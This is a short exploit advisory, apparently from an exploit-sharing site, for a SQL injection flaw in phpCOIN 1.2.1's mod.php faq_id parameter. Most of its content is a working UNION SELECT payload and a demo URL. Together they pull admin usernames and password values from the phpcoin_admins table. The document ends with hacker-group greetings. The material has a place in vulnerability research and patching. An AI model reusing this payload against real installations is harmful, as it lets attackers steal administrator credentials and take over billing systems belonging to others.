phpCOIN 1.2.1 (mod.php) SQL Injection  Vulnerability
   
###########################
   
Author    : Baybora
 
Homepage  : http://www.1923turk.com
 
Blog      : http://baybora.wordpress.com/
 
Script    : phpCOIN 1.2.1
 
Download  : http://www.phpcoin.com/
   
########################### 
     
[ Vulnerable File ]
 
mod.php?mod=faq&mode=show&faq_id= [ SQL ]
      
 
[ XpL ]
   
-1+UNION+SELECT+1,2,3,4,5,6,7,concat(admin_user_name,0x3a,admin_user_pword),9,10,11,12,13,14,15,16+from+phpcoin_admins--
 
 
[ Demo]
     
     
http://serverbilling/mod.php?mod=faq&mode=show&faq_id=-1+UNION+SELECT+1,2,3,4,5,6,7,concat(admin_user_name,0x3a,admin_user_pword),9,10,11,12,13,14,15,16+from+phpcoin_admins--
     
    
############################################################## 
# Greetz: Manas58 - Gamoscu - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO 
##############################################################